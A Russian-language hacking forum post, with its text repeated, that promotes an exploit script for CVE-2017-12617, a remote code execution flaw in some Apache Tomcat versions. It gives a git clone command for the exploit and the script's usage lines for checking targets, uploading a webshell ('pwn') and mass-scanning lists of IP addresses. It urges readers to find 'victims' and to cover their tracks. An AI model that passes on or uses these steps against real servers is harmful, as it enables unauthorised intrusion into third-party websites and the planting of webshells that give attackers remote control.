Приветствую обитателей форума и гостей которые тоже станут надеюсь в ближайшее время обитателями)
В этой статье речь пойдет о скрипте который експлуатирует уязвимые движки на которых крутятся сайты, а именно Apache Tomcat< 9.0.1 (Beta)/< 8.5.23/< 8.0.47/< 7.0.8 -JSP
Експлойт срабатывает при таких вот условиях:
"если servlet по умолчанию настроен с параметром readonly, установленным на false или servlet --> WebDAV включен с параметром readonly, то есть установленным на false"
Официальное название уязвимостей (маркировка) CVE-2017-12617 critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat
Ну и конечно же представлю Вам скрипт, который в сваю очередь прекрасно это все дело эксплуатирует под нужными условиями!
НАХодим жертв:
Вы видите какую версию Apache Tomcat я искал в данной статье) какие Вам искать, решать Вам, все уязвимые версии указаны выше!
функционал скрипта радует тем что можно в txt файл залить найденные IP адреса и дружно их все чекнуть на уязвимось.
и если ВАМ выдало вот такую вот надпись:
то Вам повезло))
Удачи!)) помните про свои ..опы, прикрывайте их, холодает))
В этой статье речь пойдет о скрипте который експлуатирует уязвимые движки на которых крутятся сайты, а именно Apache Tomcat< 9.0.1 (Beta)/< 8.5.23/< 8.0.47/< 7.0.8 -JSP
Експлойт срабатывает при таких вот условиях:
"если servlet по умолчанию настроен с параметром readonly, установленным на false или servlet --> WebDAV включен с параметром readonly, то есть установленным на false"
Официальное название уязвимостей (маркировка) CVE-2017-12617 critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat
Ну и конечно же представлю Вам скрипт, который в сваю очередь прекрасно это все дело эксплуатирует под нужными условиями!
Код:
git clone https://github.com/cyberheartmi9/CVE-2017-12617.git
НАХодим жертв:
Вы видите какую версию Apache Tomcat я искал в данной статье) какие Вам искать, решать Вам, все уязвимые версии указаны выше!
функционал скрипта радует тем что можно в txt файл залить найденные IP адреса и дружно их все чекнуть на уязвимось.
Код:
./cve-2017-12617.py [options]
options:
-u ,–url [::] check target url if it’s vulnerable
-p,–pwn [::] generate webshell and upload it
-l,–list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py –url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py –url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py –list hosts.txt
и если ВАМ выдало вот такую вот надпись:
то Вам повезло))
Удачи!)) помните про свои ..опы, прикрывайте их, холодает))